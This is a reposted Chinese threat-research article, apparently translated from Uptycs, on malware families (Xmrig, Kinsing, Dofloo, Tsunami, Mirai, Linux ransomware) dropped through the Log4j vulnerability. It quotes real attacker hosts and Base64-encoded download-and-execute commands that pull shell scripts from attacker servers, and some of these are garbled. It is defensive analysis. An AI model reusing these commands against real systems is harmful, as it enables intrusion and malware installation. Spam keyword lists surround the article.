欧美日韩激情_美女国产一区_国产精品久久久久影院日本_69xxx在线

盤點:Log4j漏洞帶來的深遠影響

2022-10-05    分類: 網站建設

上周,Log4j 漏洞顛覆了互聯網,影響是巨大。攻擊者也已經開始利用該漏,到目前為止,Uptycs 研究人員已經觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關的攻擊,這些攻擊積極利用了此漏洞。

未來幾天勒索軟件攻擊的規模可能會增加。由于該漏洞非常嚴重,因此可能還會發現一些可以繞過當前補丁級別或修復程序的變體。因針對這種攻擊持續監控和強化系統是極其重要的。

Uptycs 此前在博客中為其客戶分享了有關補救和檢測步驟的詳細信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團隊確定了投放在易受攻擊的服務器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件,如 Kinsing 和 Xmrig coinminers,以及 Dofloo、Tsunami 和 Mirai 僵尸網絡惡意軟件。除了這些惡意軟件系列,攻擊者已經開始在在易受CVE-2021-44228服務器上部署勒索軟件。

盤點:Log4j 漏洞帶來的深遠影響

1. Xmrig

Xmrig 是一個開源的 Monero CPU Miner,用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后,攻擊者試圖運行惡意 shell 腳本,其中包含下載 xmrig 礦工的命令。

命令是 93.189.42 8 []:5557,/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。

此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6

shell 腳本(見圖 1)首先殺死已經在運行的礦工二進制文件,然后從互聯網下載 xmrig 礦工二進制文件并運行它。

盤點:Log4j 漏洞帶來的深遠影響

圖 1:Shell 腳本下載并執行 Xmrig

2. Kinsing

Kinsing 是一種自我傳播的加密挖掘惡意軟件,以前針對配置錯誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的,通常是通過惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規避技術,如 setfacl 使用、chattr 使用、日志刪除命令等。

大規模掃描后的攻擊者試圖在易受攻擊的服務器上放置 kinsing 二進制文件。攻擊者用來刪除和運行 shell 腳本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.

在shell腳本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我們可以看到攻擊者在 shell 腳本運行時放置了刪除 kinsing 惡意軟件二進制文件的命令(見圖 2)。

盤點:Log4j 漏洞帶來的深遠影響

圖 2:通過 shell 腳本下載 Kinsing

kinsing shell 腳本還包含與 docker 相關的命令,這些命令會殺死受害系統上已經運行的礦工進程(如果存在)。

盤點:Log4j 漏洞帶來的深遠影響

圖 3:用于殺死已經運行的礦工的 docker 命令

3. DDoS 僵尸網絡負載

在一些漏洞利用嘗試中,攻擊者試圖刪除分布式拒絕服務 (DDoS) 惡意軟件二進制文件,如 dofloo、Mirai。

4. Dofloo

Dofloo (又名 AeSDdos,flooder)是一種DDoS類型的惡意軟件,可對目標 IP 地址進行各種泛洪攻擊,如 ICMP 和 TCP。除了泛洪攻擊外,Dofloo 通過操縱受害者系統中的 rc.local 文件來確保其持久性。它的一些變體在受害計算機上部署了加密貨幣礦工。

在情報系統中,攻擊者也在利用易受攻擊的服務器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖(參見圖 4)顯示了 Dofloo 對 rc.local 的操作:6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)在 Log4j 后利用中使用的變體。

盤點:Log4j 漏洞帶來的深遠影響

圖 4:Dofloo 操作 rc.local

5. mushtik

海嘯(又名mushtik)是基于DDoSflooder一個跨平臺的惡意軟件,在下載文件過程中被感染系統中執行shell的命令。海嘯樣本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性,它還刪除一個副本 /dev/shm/ 目錄作為防御規避策略(參見圖 5)。

盤點:Log4j 漏洞帶來的深遠影響

圖 5:Tsunami 通過 cron 從 /dev/shm 運行

6. Mirai

Mirai是一種惡意軟件,它感染在 ARC 處理器上運行的智能設備,將它們變成一個遠程控制的機器人網絡。Mirai 還通過惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實用程序從攻擊者 C2,62.210.130[.]250 中刪除 Mirai 惡意軟件(見圖 6)。

盤點:Log4j 漏洞帶來的深遠影響

圖 6:從 C2 下載 mirai 的 Shell 腳本

7. Linux

攻擊者還利用 Log4j 漏洞在易受攻擊的服務器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的,并操縱 ssh 文件在受害者系統中傳播自身。攻擊者丟棄的贖金票據如下所示(見圖 7)。

盤點:Log4j 漏洞帶來的深遠影響

圖 7:Linux 贖金說明

8. Uptycs EDR

Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進程掃描的行為規則成功檢測到所有有效負載。下面顯示了我們的行為規則主動檢測到的 Linux 勒索軟件的示例(參見圖 8)。

盤點:Log4j 漏洞帶來的深遠影響

圖 8:使用 Uptycs EDR 檢測勒索軟件

9. Xmrig

除了行為規則之外,當 YARA 檢測被觸發時,Uptycs EDR 通過威脅研究團隊策劃的 YARA 規則分配威脅配置文件。用戶可以導航到檢測警報中的工具包數據部分,然后單擊名稱以查找工具包的說明。Uptycs EDR 檢測到的 Xmrig 惡意軟件活動的摘錄如下所示(見圖 9)。

盤點:Log4j 漏洞帶來的深遠影響

圖 9:使用 Uptycs EDR 進行 XMrig 檢測

網頁題目:盤點:Log4j漏洞帶來的深遠影響
文章位置:http://m.kartarina.com/news4/201854.html

成都網站建設公司_創新互聯,為您提供網站設計微信小程序網站導航微信公眾號用戶體驗網站設計公司

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

h5響應式網站建設
欧美日韩激情_美女国产一区_国产精品久久久久影院日本_69xxx在线
久久久精品2019中文字幕之3| 欧美日韩国产中文| 婷婷久久综合九色综合绿巨人| 国产成人av一区二区| 麻豆91小视频| 精品一区二区三区免费观看| 香港成人在线视频| 亚洲成人在线免费| 免费在线观看视频一区| 日日夜夜一区二区| 国产自产高清不卡| 从欧美一区二区三区| 国产精品一区2区| 成人免费的视频| 色综合中文字幕国产 | 国产精品夜夜爽| 国产永久精品大片wwwapp | 欧美日韩精品一区二区三区四区| 亚洲妇女屁股眼交7| 午夜久久久影院| 韩国女主播一区二区三区| 国产乱码精品1区2区3区| 成人毛片在线观看| 欧美优质美女网站| 欧美成人精品3d动漫h| 久久综合久色欧美综合狠狠| 欧美国产成人精品| 亚洲国产日日夜夜| 韩国v欧美v日本v亚洲v| 色综合天天综合网天天狠天天| 免费成人在线网站| 成人一区二区三区视频| 色婷婷av一区二区三区软件| 538prom精品视频线放| 日本一区免费视频| 日韩制服丝袜先锋影音| 国产91精品一区二区麻豆网站| 天使萌一区二区三区免费观看| 亚洲图片你懂的| 麻豆精品国产91久久久久久| 成人一级片网址| 欧美大片免费久久精品三p| 国产欧美1区2区3区| 日本在线不卡一区| 99久久国产免费看| 精品国产乱码久久久久久图片| 欧美精品高清视频| 国产精品福利av | 国产激情一区二区三区| 在线国产亚洲欧美| 国产色一区二区| 亚洲va欧美va人人爽午夜| 国产成人福利片| 日韩精品一区二区三区在线观看| 制服丝袜亚洲播放| 亚洲精品一二三| 99久久免费视频.com| 精品88久久久久88久久久| 亚洲国产精品人人做人人爽| 成人av资源在线观看| 久久久www成人免费无遮挡大片 | 国产欧美一区二区精品忘忧草| 精品免费视频一区二区| 亚洲国产成人av好男人在线观看| 一区二区在线观看视频在线观看| 亚洲女女做受ⅹxx高潮| 成人免费福利片| 中文字幕av一区二区三区| 国产成人在线视频网址| 欧美va亚洲va国产综合| 老司机精品视频在线| 91精品久久久久久蜜臀| 免费人成在线不卡| 欧美一区二区三区视频| 午夜久久久久久| 欧美一卡在线观看| 精品亚洲国产成人av制服丝袜| 成人国产视频在线观看| 中文字幕av资源一区| 成人av在线影院| 中文字幕精品在线不卡| gogogo免费视频观看亚洲一| 亚洲视频一区在线观看| 91国产福利在线| 日韩av不卡在线观看| 日韩精品最新网址| 久久精品国产亚洲a| 久久综合九色欧美综合狠狠 | 91麻豆精品国产自产在线| 亚洲成av人综合在线观看| 欧美精品1区2区3区| 蜜臀a∨国产成人精品| 久久久精品国产99久久精品芒果| 亚洲精品国产视频| 欧美日韩成人综合| 精品一区二区三区在线播放视频| 99国产精品久| 五月婷婷激情综合网| 久久久久一区二区三区四区| 不卡的电影网站| 亚洲成人av免费| 久久亚洲一级片| 91福利国产精品| 激情综合色综合久久| 国产精品网站在线播放| 欧美吻胸吃奶大尺度电影| 韩国在线一区二区| 亚洲自拍偷拍麻豆| 亚洲精品一区二区三区香蕉| 色中色一区二区| 韩国欧美一区二区| 午夜精品在线看| 中文字幕av不卡| 欧美哺乳videos| 91极品美女在线| 岛国av在线一区| 久久不见久久见中文字幕免费| 7777精品伊人久久久大香线蕉超级流畅 | 视频精品一区二区| 国产精品国产三级国产普通话蜜臀| 石原莉奈在线亚洲三区| 国产精品视频yy9299一区| 欧美一级久久久| 91黄色免费网站| 成人激情电影免费在线观看| 免费视频最近日韩| 一区二区三区欧美激情| 久久精品视频一区二区三区| 欧美精品日韩一区| 色狠狠综合天天综合综合| 国产成人免费9x9x人网站视频| 日本一区二区综合亚洲| 欧美日韩免费电影| 在线免费观看日本欧美| 不卡电影一区二区三区| 成人晚上爱看视频| 国产精品99久久久久久宅男| 美女视频一区二区| 男人的j进女人的j一区| 亚洲国产视频直播| 一区二区三区四区av| 亚洲欧美一区二区三区久本道91| 欧美怡红院视频| 91麻豆福利精品推荐| 成人综合在线网站| 国产美女在线精品| 国内精品伊人久久久久av一坑| 国产精品你懂的| 亚洲国产精品av| 国产精品理论片在线观看| 国产欧美一区二区精品秋霞影院| 成人av免费在线观看| 高清视频一区二区| 国产成人综合亚洲91猫咪| 国产精品主播直播| 不卡的av电影| 91美女视频网站| 欧美三级中文字幕在线观看| 欧美午夜电影网| 日韩一区二区三区精品视频| 欧美成人乱码一区二区三区| 欧美电影免费观看高清完整版在线 | 日日夜夜免费精品| 男女男精品网站| 激情综合色综合久久| 成人午夜精品在线| 91亚洲国产成人精品一区二区三 | 最好看的中文字幕久久| 一区在线观看免费| 亚洲福利视频一区| 九九精品视频在线看| 国产成人av电影| 色噜噜狠狠一区二区三区果冻| 老司机精品视频在线| 国产成人av电影在线观看| 91看片淫黄大片一级| 欧美老人xxxx18| 久久精品视频免费| 亚洲卡通欧美制服中文| 午夜久久福利影院| 国产精品99久久久久久久vr| 91蝌蚪porny| 日韩女优av电影| 中文字幕中文字幕在线一区 | 亚洲福利一区二区| 国产精品一区三区| 在线观看不卡一区| 久久一日本道色综合| 亚洲精品成人少妇| 精品一区二区三区免费毛片爱| 亚洲高清一区二区三区| 国产一区二区伦理| 欧美特级限制片免费在线观看| 国产福利一区二区三区视频| 97久久超碰精品国产| 欧美r级在线观看| 亚洲福利视频一区二区| 成人国产一区二区三区精品| 欧美成人伊人久久综合网| 一区二区在线观看免费|